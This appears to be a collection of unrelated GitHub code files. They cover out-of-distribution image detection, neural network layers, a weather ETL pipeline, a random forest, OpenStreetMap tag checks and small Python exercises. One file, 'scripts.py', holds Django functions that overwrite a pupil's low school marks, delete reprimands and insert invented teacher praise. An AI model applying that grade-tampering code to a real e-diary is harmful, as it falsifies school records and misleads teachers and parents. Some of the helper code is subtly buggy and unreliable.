'cifar100':\n trainset = torchvision.datasets.CIFAR100(root=args.stored_data_path, train=True, download=True, transform=transform_all)\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=4)\n\n test_data = torchvision.datasets.CIFAR100(root=args.stored_data_path, train=False, download=True, transform=transform_all)\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=args.batch_size, shuffle=False, num_workers=4)\n 
args.num_class = 100\nelse:\n print('The dataset is not provided.')\n\nif args.model == 'resnet18':\n net = ResNet.ResNet18(num_classes=args.num_class)\nelif args.model == 'resnet34':\n net = ResNet.ResNet34(num_classes=args.num_class)\nelif args.model=='wrn':\n net = WideResNet(args.layers, args.num_class, args.widen_factor, dropRate=args.droprate)\n\n\n\n\nnet = nn.DataParallel(net).cuda()\nPATH = './checkpoints/{}/test_useresize_{}_size_{}.pth'.format(args.dataset,args.model,args.resize_val)\n\n\nnet.load_state_dict(torch.load(PATH,map_location=None))\nnet.eval()\n\n# ---------If you want to test the accuracy of this model, you can use the code below:------\n\n# def valid(model, valid_loader,numclass):\n# valid_loss = 0\n# correct = 0\n# with torch.no_grad():\n# for data, target in valid_loader:\n# data, target = data.cuda(), target.cuda()\n# model = model.cuda()\n# prediction,_ = model(data)\n# critetion = nn.CrossEntropyLoss()\n# loss = critetion(prediction,target)\n# valid_loss += loss.item()\n# pred = prediction.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n# correct += pred.eq(target.view_as(pred)).sum().item()\n# valid_loss /= len(valid_loader.dataset)\n# accuracy = 100. * correct / len(valid_loader.dataset)\n# return valid_loss, correct, accuracy\n\n# print('valid initialization')\n# valid_loss, valid_correct, valid_accuracy = valid(net, test_loader,args.num_class)\n# print('validing set: Average loss: {:.4f}, Accuracy: ({:.4f}%)'.format(valid_loss, valid_accuracy))\n\n\n# Used for the ReAct method\ndef get_threshold(p=0.9):\n tempres = []\n with torch.no_grad():\n for data, target in train_loader:\n data, target = data.cuda(), target.cuda()\n _,penultimate = net(data,need_penultimate=args.need_penultimate)\n for i in range(penultimate.size(0)):\n cur_feature = penultimate[i].detach().tolist()\n tempres.extend(cur_feature)\n tempres.sort()\n index = int(len(tempres)*p)\n threshold = tempres[index]\n return threshold\n\nif args.score == 'ReAct':\n args.threshold = get_threshold(p=0.9) \nelif args.score == 'SHE_react':\n args.threshold = get_threshold(p=0.95) \n\n\n# /////////////// Detection Prelims ///////////////\n\nood_num_examples = len(test_data) // 5\nexpected_ap = ood_num_examples / (ood_num_examples + len(test_data))\n\nconcat = lambda x: np.concatenate(x, axis=0)\nto_np = lambda x: x.data.cpu().numpy()\n\n\ndef get_ood_scores(loader, in_dist=False):\n _score = []\n with torch.no_grad():\n for batch_idx, (data, target) in enumerate(loader):\n if batch_idx >= ood_num_examples // args.batch_size and in_dist is False:\n break\n\n data = data.cuda()\n\n\n if args.score == 'SHE':\n output,penultimate = net(data,need_penultimate=args.need_penultimate)\n _score.extend(simple_compute_score_HE(prediction=output,penultimate=penultimate))\n elif args.score == 'SHE_react':\n output,penultimate = net(data,threshold=args.threshold,need_penultimate=args.need_penultimate)\n _score.extend(simple_compute_score_HE(prediction=output,penultimate=penultimate))\n elif args.score == 'HE':\n output,penultimate = net(data,need_penultimate=args.need_penultimate)\n _score.extend(compute_score_HE(prediction=output,penultimate=penultimate))\n elif args.score == 'MSP':\n output,penultimate = net(data,need_penultimate=args.need_penultimate)\n smax = to_np(F.softmax(output, dim=1))\n _score.append(-np.max(smax, axis=1))\n elif args.score == 'Energy':\n output,penultimate = net(data,need_penultimate=args.need_penultimate)\n _score.append(-to_np((args.T * torch.logsumexp(output / 
args.T, dim=1))))\n elif args.score == 'ReAct':\n output,penultimate = net(data,threshold=args.threshold)\n _score.append(-to_np((args.T * torch.logsumexp(output / args.T, dim=1))))\n if in_dist:\n return concat(_score).copy()\n else:\n return concat(_score)[:ood_num_examples].copy()\n\n\n\ndef compute_score_HE(prediction,penultimate):\n #----------------------------------------Step 1: classify the test features-----------------------------------\n numclass = args.num_class\n feature_list = [None for i in range(numclass)]\n pred = prediction.argmax(dim=1, keepdim=True)\n # get each class tensor\n for i in range(numclass):\n each_label_tensor = torch.tensor([i for _ in range(prediction.size(0))]).cuda()\n target_index = pred.eq(each_label_tensor.view_as(pred))\n\n # get the penultimate layer\n each_label_feature = penultimate[target_index.squeeze(1)]\n if each_label_feature.size(0) == 0: continue # skip classes with no predicted samples\n if feature_list[i] is None:\n feature_list[i] = each_label_feature\n else:\n feature_list[i] = torch.cat((feature_list[i],each_label_feature),dim=0)\n \n\n #----------------------------------------Step 2: get the stored pattern------------------------------------\n stored_feature_list = []\n for i in range(numclass):\n path = './stored_pattern/all_stored_pattern/size_{}/{}/{}/stored_all_class_{}.pth'.format(args.resize_val,args.dataset,args.model,i)\n stored_tensor = torch.load(path)\n stored_feature_list.append(stored_tensor) #Here we get all the stored patterns\n\n res = []\n #----------------------------------------Step 3: compute energy--------------------------------------------------------------------\n for i in range(numclass):\n\n if feature_list[i] is None: continue # guard before use: no test samples were assigned to this class\n test_feature = feature_list[i].transpose(0,1) #[dim,B_test]\n stored_feature = stored_feature_list[i] #[B_stored,dim]\n\n res_energy_score = torch.mm(stored_feature,test_feature) #[B_stored,B_test]\n lse_res = -to_np(torch.logsumexp(res_energy_score*args.beita, dim=0)) #[1,B_test]\n res.append(lse_res)\n return res \n\n\n\n\ndef simple_compute_score_HE(prediction,penultimate,need_mask=False):\n\n numclass = args.num_class\n #----------------------------------------Step 1: classify the test features-----------------------------------\n pred = prediction.argmax(dim=1, keepdim=False)\n pred = pred.cpu().tolist()\n \n #----------------------------------------Step 2: get the stored pattern------------------------------------\n\n total_stored_feature = None\n for i in range(numclass):\n path = './stored_pattern/avg_stored_pattern/size_{}/{}/{}/stored_avg_class_{}.pth'.format(args.resize_val,args.dataset,args.model,i)\n stored_tensor = torch.load(path)\n if total_stored_feature is None:\n total_stored_feature = stored_tensor\n else:\n total_stored_feature = torch.cat((total_stored_feature,stored_tensor),dim=0)\n #--------------------------------------------------------------------------------------\n\n target = total_stored_feature[pred,:]\n res = []\n\n # for ablation exp: different metric for SHE\n if args.metric == 'inner_product':\n res_energy_score = torch.sum(torch.mul(penultimate,target),dim=1) #inner product\n elif args.metric == 'euclidean_distance':\n res_energy_score = -torch.sqrt(torch.sum((penultimate-target)**2, dim=1))\n elif args.metric == 'cos_similarity':\n res_energy_score = torch.cosine_similarity(penultimate,target, dim=1)\n lse_res = -to_np(res_energy_score)\n res.append(lse_res)\n return res\n\n\n\n\n\n\n\nif args.score == 'SHE_with_perturbation':\n in_score = 
lib.get_ood_scores_perturbation(args,test_loader, net, args.batch_size, ood_num_examples, args.T, args.noise, in_dist=True)\nelse:\n in_score = get_ood_scores(test_loader, in_dist=True)\n\n\n# /////////////// OOD Detection ///////////////\n# auroc_list, aupr_list, fpr_list = [], [], []\n\ndef get_and_print_results(ood_loader, num_to_avg=args.num_to_avg):\n\n aurocs, auprs, fprs = [], [], []\n\n for _ in range(num_to_avg):\n if args.score == 'SHE_with_perturbation':\n out_score = lib.get_ood_scores_perturbation(args,ood_loader, net, args.batch_size, ood_num_examples, args.T, args.noise)\n else:\n out_score = get_ood_scores(ood_loader)\n measures = get_measures(-in_score, -out_score)\n aurocs.append(measures[0]); auprs.append(measures[1]); fprs.append(measures[2])\n\n\n auroc = np.mean(aurocs); aupr = np.mean(auprs); fpr = np.mean(fprs)\n\n if num_to_avg >= 5:\n print_measures_with_std(aurocs, auprs, fprs, method_name='method:{}\\tsize:{}\\tdataset:{}\\tmodel:{}'.format(args.score,args.resize_val,args.dataset,args.model))\n else:\n print_measures(auroc, aupr, fpr, method_name='method:{}_dataset:{}'.format(args.score,args.dataset))\n return 100*np.mean(fprs), 100*np.mean(aurocs)\n\n\n\n\nfprlist,auclist = [],[]\n# # # /////////////// SVHN /////////////// \nood_data = torchvision.datasets.SVHN(root=os.path.join(args.stored_data_path,'svhn'), split=\"test\",download=True,\n transform=transform_all)\nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nSVHN Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # /////////////// LSUN-C ///////////////\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'LSUN_C'),\n transform=transform_all)\nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nLSUN_C Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n# # # /////////////// LSUN-R ///////////////\nood_data = dset.ImageFolder(os.path.join(args.stored_data_path,'LSUN_resize'),\n transform=transform_all)\nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nLSUN_Resize Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # /////////////// iSUN ///////////////\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'iSUN'),\n transform=transform_all)\nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\niSUN Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # /////////////// Places365 ///////////////\n\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'Places'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nPlaces365 Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n\n\n\n# # /////////////// Textures ///////////////\n\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'dtd/images'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, 
pin_memory=True)\nprint('\\n\\nTexture Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # # /////////////// Tiny Imagenet /////////////// # cropped and no sampling of the test set\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'Imagenet_resize'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nTiny Imagenet Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# /////////////// SUN /////////////// # cropped and no sampling of the test set\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'SUN'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nSUN Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # /////////////// iNaturalist /////////////// # cropped and no sampling of the test set\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'iNaturalist/'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\niNaturalist Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\nprint('avg:',sum(fprlist)/len(fprlist),sum(auclist)/len(auclist))","repo_name":"zjs975584714/SHE_ood_detection","sub_path":"test_score_ood_detection.py","file_name":"test_score_ood_detection.py","file_ext":"py","file_size_in_byte":17748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"36940333341","text":"#1- having string 'hello' use indexing and reverse indexing to get the letter 'e'\nmyvar1 = 'hello'\nprint(myvar1[1])\nprint(myvar1[-4])\n\n#2- [1,2,[3,4,'dog']] change the word 'dog' to 'cat'\nmyvar2 = [1,2,[3,4,'dog']]\nmyvar2[2][2] = 'cat'\nprint(myvar2)\n\n#3- grap the word 'hello' from these dictionaries:\n# {'k':'hello'}\nmyvar3 = {'k':'hello'}\nresult = myvar3['k']\nprint(result)\n# {'k1':{'k2':'hello'}}\nmyvar4 = {'k1':{'k2':'hello'}}\nresult = myvar4['k1']['k2']\nprint(result)\n# {'k1':[1,2,{'k2':{'k3':'hello'}}]}\nmyvar5 = {'k1':[1,2,{'k2':{'k3':'hello'}}]}\nresult = myvar5['k1'][2]['k2']['k3']\nprint(result)","repo_name":"farisslewa/python-resources","sub_path":"assignments/solution 1.py","file_name":"solution 1.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"20341766430","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.init import kaiming_normal, kaiming_uniform\nfrom functools import partial\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, in_dim, out_dim=None,\n with_residual=True,\n with_batchnorm=True,\n with_film=False,\n with_coords=False,\n coord_shape=None,\n downsample=False,\n is_3d=False):\n if out_dim is None:\n out_dim = in_dim\n super(ResidualBlock, self).__init__()\n\n if is_3d:\n conv_class = nn.Conv3d\n bn_class = nn.BatchNorm3d\n else:\n conv_class = nn.Conv2d\n bn_class = nn.BatchNorm2d\n\n self.with_coords = with_coords\n coord_dim = 0\n if with_coords:\n if coord_shape is None:\n raise Exception(\"Need to specify spatial dim of coord layers\")\n else:\n 
if is_3d:\n self.coords = coord_map_3d(coord_shape)\n coord_dim = 3\n else:\n self.coords = coord_map(coord_shape)\n coord_dim = 2\n\n self.conv1 = conv_class(in_dim+coord_dim,\n out_dim,\n kernel_size=3,\n padding=1)\n self.conv2 = conv_class(out_dim,\n out_dim,\n kernel_size=3,\n padding=1,\n stride=2 if downsample else 1)\n self.with_batchnorm = with_batchnorm\n self.with_film = with_film\n self.is_3d = is_3d\n\n if with_batchnorm:\n self.bn1 = bn_class(out_dim, affine=False)\n self.bn2 = bn_class(out_dim, affine=False)\n self.film = None\n if with_film:\n self.film = Film()\n self.with_residual = with_residual\n if not downsample and (in_dim == out_dim or not with_residual):\n self.proj = None\n else:\n if downsample:\n self.proj = nn.Sequential(\n conv_class(in_dim+coord_dim,\n out_dim, kernel_size=1),\n nn.AvgPool3d(2) if is_3d else nn.AvgPool2d(2)\n )\n else:\n self.proj = conv_class(in_dim+coord_dim,\n out_dim, kernel_size=1)\n\n def forward(self, x, embedding=None):\n orig_x = x\n if self.with_coords:\n if self.is_3d:\n coords = self.coords.repeat(x.size(0), 1, 1, 1, 1)\n else:\n coords = self.coords.repeat(x.size(0), 1, 1, 1)\n x = torch.cat((x, coords), dim=1)\n if self.with_batchnorm:\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n if self.film is not None:\n out = self.film(out, embedding)\n else:\n out = self.conv2(F.relu(self.conv1(x)))\n res = orig_x if self.proj is None else self.proj(x)\n if self.with_residual:\n out = F.relu(res + out)\n else:\n out = F.relu(out)\n return out\n\ndef coord_map(shape, start=-1, end=1):\n \"\"\"\n Given a 2d shape tuple (m, n), returns a stack of two mxn coordinate maps,\n ranging from start to end in the x and y directions, respectively.\n \"\"\"\n m, n = shape\n x_coord_row = torch.linspace(start, end, steps=n).type(torch.cuda.FloatTensor)\n y_coord_row = torch.linspace(start, end, steps=m).type(torch.cuda.FloatTensor)\n x_coords = x_coord_row.unsqueeze(0).expand(torch.Size((m, n))).unsqueeze(0)\n y_coords = y_coord_row.unsqueeze(1).expand(torch.Size((m, n))).unsqueeze(0)\n return torch.cat([x_coords, y_coords], 0)\n\ndef coord_map_3d(shape, start=-1, end=1):\n \"\"\"\n Given a 3d shape tuple (m, n, o), returns a stack of three coordinate maps,\n ranging from start to end in the x, y and z directions, respectively.\n \"\"\"\n m, n, o = shape\n x_coord_row = torch.linspace(start, end, steps=n).type(torch.cuda.FloatTensor)\n y_coord_row = torch.linspace(start, end, steps=o).type(torch.cuda.FloatTensor)\n z_coord_row = torch.linspace(start, end, steps=m).type(torch.cuda.FloatTensor)\n\n x_coords = x_coord_row.unsqueeze(0).expand(torch.Size((m, n, o))).unsqueeze(0)\n y_coords = y_coord_row.unsqueeze(1).expand(torch.Size((m, n, o))).unsqueeze(0)\n #z_coords = z_coord_row.unsqueeze(2).expand(torch.Size((m, n, o))).unsqueeze(0)\n z_coords = z_coord_row.unsqueeze(0).view(-1, m, 1, 1).repeat(1,1,n,o)\n\n return torch.cat([x_coords, y_coords, z_coords], 0)\n\n\nclass Film(nn.Module):\n \"\"\"\n A Feature-wise Linear Modulation Layer from\n 'FiLM: Visual Reasoning with a General Conditioning Layer'\n \"\"\"\n def forward(self, x, embedding):\n gammas = embedding[:, 0:(embedding.size(1)//2)]\n betas = embedding[:, (embedding.size(1)//2)::]\n if len(x.shape) == 4:\n gammas = gammas.unsqueeze(2).unsqueeze(3).expand_as(x)\n betas = betas.unsqueeze(2).unsqueeze(3).expand_as(x)\n elif len(x.shape) == 5:\n gammas = gammas.unsqueeze(2).unsqueeze(3).unsqueeze(4).expand_as(x)\n betas = betas.unsqueeze(2).unsqueeze(3).unsqueeze(4).expand_as(x)\n else:\n raise Exception(\"Expected a 4d or 5d input\")\n\n return 
(gammas * x) + betas\n\nclass ConcatBlock(nn.Module):\n def __init__(self, dim, with_residual=True, with_batchnorm=True):\n super(ConcatBlock, self).__init__()\n self.proj = nn.Conv2d(2 * dim, dim, kernel_size=1, padding=0)\n self.res_block = ResidualBlock(dim, with_residual=with_residual,\n with_batchnorm=with_batchnorm)\n\n def forward(self, x, y):\n out = torch.cat([x, y], 1) # Concatentate along depth\n out = F.relu(self.proj(out))\n out = self.res_block(out)\n return out\n\n\nclass GlobalAveragePool(nn.Module):\n def forward(self, x):\n N, C = x.size(0), x.size(1)\n return x.view(N, C, -1).mean(2).squeeze(2)\n\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size(0), -1)\n\n\ndef build_stem(feature_dim, module_dim, num_layers=2, with_batchnorm=True,\n kernel_size=3, stride=1, padding=None):\n layers = []\n prev_dim = feature_dim\n if padding is None: # Calculate default padding when None provided\n if kernel_size % 2 == 0:\n raise(NotImplementedError)\n padding = kernel_size // 2\n for i in range(num_layers):\n layers.append(nn.Conv2d(prev_dim, module_dim, kernel_size=kernel_size, stride=stride,\n padding=padding))\n if with_batchnorm:\n layers.append(nn.BatchNorm2d(module_dim))\n layers.append(nn.ReLU(inplace=True))\n prev_dim = module_dim\n return nn.Sequential(*layers)\n\n\ndef build_classifier(module_C, module_H, module_W, num_answers,\n fc_dims=[], proj_dim=None, downsample='maxpool2',\n with_batchnorm=True, dropout=0):\n layers = []\n prev_dim = module_C * module_H * module_W\n if proj_dim is not None and proj_dim > 0:\n layers.append(nn.Conv2d(module_C, proj_dim, kernel_size=1))\n if with_batchnorm:\n layers.append(nn.BatchNorm2d(proj_dim))\n layers.append(nn.ReLU(inplace=True))\n prev_dim = proj_dim * module_H * module_W\n if 'maxpool' in downsample or 'avgpool' in downsample:\n pool = nn.MaxPool2d if 'maxpool' in downsample else nn.AvgPool2d\n if 'full' in downsample:\n if module_H != module_W:\n assert(NotImplementedError)\n pool_size = module_H\n else:\n pool_size = int(downsample[-1])\n # Note: Potentially sub-optimal padding for non-perfectly aligned pooling\n padding = 0 if ((module_H % pool_size == 0) and (module_W % pool_size == 0)) else 1\n layers.append(pool(kernel_size=pool_size, stride=pool_size, padding=padding))\n prev_dim = proj_dim * math.ceil(module_H / pool_size) * math.ceil(module_W / pool_size)\n if downsample == 'aggressive':\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\n layers.append(nn.AvgPool2d(kernel_size=module_H // 2, stride=module_W // 2))\n prev_dim = proj_dim\n fc_dims = [] # No FC layers here\n layers.append(Flatten())\n for next_dim in fc_dims:\n layers.append(nn.Linear(prev_dim, next_dim))\n if with_batchnorm:\n layers.append(nn.BatchNorm1d(next_dim))\n layers.append(nn.ReLU(inplace=True))\n if dropout > 0:\n layers.append(nn.Dropout(p=dropout))\n prev_dim = next_dim\n layers.append(nn.Linear(prev_dim, num_answers))\n return nn.Sequential(*layers)\n\n\ndef init_modules(modules, init='uniform'):\n if init.lower() == 'normal':\n init_params = kaiming_normal\n elif init.lower() == 'uniform':\n init_params = kaiming_uniform\n else:\n return\n for m in modules:\n if isinstance(m, (nn.Conv2d, nn.Linear)):\n init_params(m.weight)\n","repo_name":"christopher-beckham/clevr-mrt","sub_path":"src/architectures/clevr/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":8340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} 
+{"seq_id":"72557970554","text":"import random\n\nfrom datacenter.models import (Chastisement,\n Commendation,\n Lesson,\n Mark,\n Schoolkid,\n Subject\n )\n\ndef get_schoolkid(schoolkid_name):\n try:\n schoolkid = Schoolkid.objects.get(full_name__contains=schoolkid_name)\n return schoolkid\n except MultipleObjectsReturned:\n print('Найдено учеников больше, чем один. Уточните имя!')\n except ObjectDoesNotExist:\n print('Ученик не найден, проверьте правильность имени')\n\n\ndef get_subject(commendation_subject, schoolkid):\n try:\n subject = Subject.objects.get(title=commendation_subject,\n year_of_study=schoolkid.year_of_study\n )\n return subject\n except ObjectDoesNotExist:\n print('Предмет не найден, проверьте правильность названия')\n\n\ndef fix_marks(schoolkid_name):\n schoolkid = get_schoolkid(schoolkid_name)\n bad_marks = Mark.objects.filter(schoolkid=schoolkid,\n points__lt=4\n )\n for mark in bad_marks:\n mark.points = random.randint(4, 5)\n mark.save()\n print(f'Оценки для {schoolkid_name} исправлены')\n\n\ndef remove_chastisements(schoolkid_name):\n schoolkid = get_schoolkid(schoolkid_name)\n chatisements = Chastisement.objects.filter(schoolkid=schoolkid)\n chatisements.delete()\n print(f'Замечания для {schoolkid_name} убраны')\n\n\ndef get_commendation(schoolkid_name, commendation_subject):\n schoolkid = get_schoolkid(schoolkid_name)\n commendation = [\n \"Молодец\",\n \"Отлично\",\n \"Хорошо!\",\n \"Гораздо лучше, чем я ожидал!\",\n \"Ты меня приятно удивил!\",\n \"Великолепно!\",\n \"Прекрасно!\",\n \"Ты меня очень обрадовал!\",\n \"Именно этого я давно ждал от тебя!\",\n \"Сказано здорово – просто и ясно!\",\n \"Ты, как всегда, точен!\",\n \"Очень хороший ответ!\",\n \"Талантливо!\",\n \"Ты сегодня прыгнул выше головы!\",\n \"Я поражен!\",\n \"Уже существенно лучше!\",\n \"Потрясающе!\",\n \"Замечательно!\",\n \"Прекрасное начало!\",\n \"Так держать!\",\n \"Ты на верном пути!\",\n \"Здорово!\",\n \"Это как раз то, что нужно!\",\n \"Я тобой горжусь!\",\n \"С каждым разом у тебя получается всё лучше!\",\n \"Мы с тобой не зря поработали!\",\n \"Я вижу, как ты стараешься!\",\n \"Ты растешь над собой!\",\n \"Ты многое сделал, я это вижу!\",\n \"Теперь у тебя точно все получится!\"\n ]\n if not schoolkid:\n return\n subject = get_subject(commendation_subject=commendation_subject,\n schoolkid=schoolkid\n )\n if not subject:\n return\n lessons = Lesson.objects.filter(year_of_study=schoolkid.year_of_study,\n group_letter=schoolkid.group_letter,\n subject=subject\n )\n text_commendation = random.choice(commendation)\n Commendation.objects.create(text=text_commendation,\n created=lessons.first().date,\n schoolkid=schoolkid,\n teacher=lessons.first().teacher,\n subject=subject\n )\n print(f'Добавлена похвала для {schoolkid_name} по предмету '\n f'{subject}: {text_commendation}')\n","repo_name":"axrasp/hack_e_diary","sub_path":"scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42733538937","text":"def bit_distance(b1: bytes, b2: bytes) -> int:\n assert len(b1) == len(b2)\n distance = 0\n for i in range(0, len(b1)):\n for j in range(0, len(b1)):\n bit1 = (b1[i] >> j) % 2\n bit2 = (b2[i] >> j) % 2\n if bit1 != bit2:\n distance += 1\n return distance\n\n\ndef normalized_bit_distance(bs: bytes, x: int) -> float:\n s1 = bs[:1 * x]\n s2 = bs[1 * x:2 * x]\n return bit_distance(s1, s2) / x\n\n\ndef average_bit_distance(bs: bytes, x: int) -> float:\n s1 = 
bs[:1 * x]\n s2 = bs[1 * x:2 * x]\n s3 = bs[2 * x:3 * x]\n s4 = bs[3 * x:4 * x]\n\n score = 0\n for i in [s1, s2, s3, s4]:\n for j in [s1, s2, s3, s4]:\n if i != j:\n score += bit_distance(i, j)\n return score / x\n","repo_name":"kumikoda/cryptopals-python","sub_path":"crypto/hamming.py","file_name":"hamming.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
+{"seq_id":"20335447678","text":"import os\nimport sys\nfrom abc import ABCMeta\nsys.path.append(os.path.join('..', '..'))\n\nimport pandas as pd\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nimport config\nfrom modules.base.connector import DatabaseConnector\n\nclass Transformer():\n def __init__(self, name, statement):\n self.__name = name\n self.__statement = statement\n\n def get_statement(self):\n return self.__statement\n\n'''\nExpansions\n'''\n\nclass WeatherDatabaseManager(DatabaseConnector):\n def __init__(self):\n self.create_transforms()\n self.create_date_table()\n\n ## Database Deployment\n def create_transforms(self):\n self.__transformers = []\n for file in filter(lambda x: x.startswith('Transform') ,os.listdir(os.path.join(config.MODULES_PATH, 'etl', 'sql'))):\n with open(os.path.join(os.path.join(config.MODULES_PATH, 'etl', 'sql', file)), 'r') as stmt:\n tran = Transformer(file.removesuffix('.sql'), stmt.read())\n self.__transformers.append(tran)\n \n # NB: 'self' is undefined at class-definition time; assuming the decorator\n # is exposed on the DatabaseConnector base class, reference it directly.\n @DatabaseConnector.execute_returned_sql_transaction\n def create_date_table(self):\n with open(os.path.join(os.path.join(config.MODULES_PATH, 'etl', 'sql', 'CreateDate.sql')), 'r') as stmt:\n return stmt.read()\n\n ## ETL\n def perform_etl(self):\n self.extract_from_csv()\n self.transform_and_load()\n\n ## Extraction of Data into source from csvs\n def extract_from_csv(self):\n # Dynamically Get the Data from the CSV\n for file in ['province_detail.csv', 'station_detail.csv', 'climate_data.csv']:\n df = pd.read_csv(os.path.join(config.DATA_PATH, file))\n name = file.split('_')[0] # e.g. 'province' from 'province_detail.csv'\n df.columns = [col.lower() for col in df.columns]\n rows = df.to_sql(f'{name}', self.get_engine(), schema='public', if_exists='append', index=False)\n\n def transform_and_load(self):\n for transformer in self.__transformers:\n WeatherDatabaseManager.execute_transform_statement(transformer)\n \n @staticmethod\n @DatabaseConnector.execute_returned_sql_transaction\n def execute_transform_statement(transformer):\n return transformer.get_statement()\n","repo_name":"Paolo1151/WeatherWebApp","sub_path":"modules/etl/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"14445361752","text":"from math import inf\nimport sys\nsys.path.append(\"../DecisionTree\")\nimport DecisionTree\n\ndef RandomForests(data, attrDict, labelCol, gainMethod, T, featureSetSize, samplesize):\n import random, math\n forest = []\n\n for i in range(T):\n samples = random.choices(data, k=math.ceil(samplesize*len(data)))\n\n root = DecisionTree.Tree(None)\n root.depth = 0\n DecisionTree.ID3_RandTree(samples, attrDict, labelCol, root, inf, gainMethod, None, featureSetSize)\n forest.append(root)\n\n return forest\n\ndef predict(data, predictCol, forest):\n import copy\n predictData = copy.deepcopy(data)\n\n for example in predictData:\n example[predictCol] = predict_example(example, predictCol, forest)\n\n return predictData\n\ndef predict_example(example, predictCol, forest):\n labelVotes = 
{}\n for root in forest:\n thisPredict = DecisionTree.predict_example(example, predictCol, root)\n if thisPredict not in labelVotes:\n labelVotes[thisPredict] = 1\n else:\n labelVotes[thisPredict] += 1\n return max(labelVotes, key=labelVotes.get)\n","repo_name":"u0857568/CS6350","sub_path":"EnsembleLearning/RandomForestMain.py","file_name":"RandomForestMain.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18228125829","text":"\"\"\"\nCheck the \"k\" value for each \"<tag>\" and see if there are any potential problems.\n\nThe function 'key_type' provides a count of each of four tag categories in a dictionary:\n \"lower\", for tags that contain only lowercase letters and are valid,\n \"lower_colon\", for otherwise valid tags with a colon in their names,\n \"problemchars\", for tags with problematic characters, and\n \"other\", for other tags that do not fall into the other three categories.\n\"\"\"\n\n\nimport xml.etree.cElementTree as ET\nimport pprint\nimport re\n\n\n\"\"\"\n3 regular expressions provided by Udacity Data Analyst Nanodegree \nchecking for certain patterns in the tags. \n\"\"\"\nlower = re.compile(r'^([a-z]|_)*$')\nlower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')\nproblemchars = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\n\n\ndef key_type(element, keys):\n if element.tag == \"tag\":\n key = element.attrib['k']\n if lower.search(key):\n keys['lower'] = keys['lower'] + 1\n elif lower_colon.search(key):\n keys['lower_colon'] = keys['lower_colon'] + 1\n elif problemchars.search(key):\n keys['problemchars'] = keys['problemchars'] + 1\n else:\n keys['other'] = keys['other'] + 1\n \n return keys\n\n\ndef process_map(filename):\n keys = {\"lower\": 0, \"lower_colon\": 0, \"problemchars\": 0, \"other\": 0}\n for _, element in 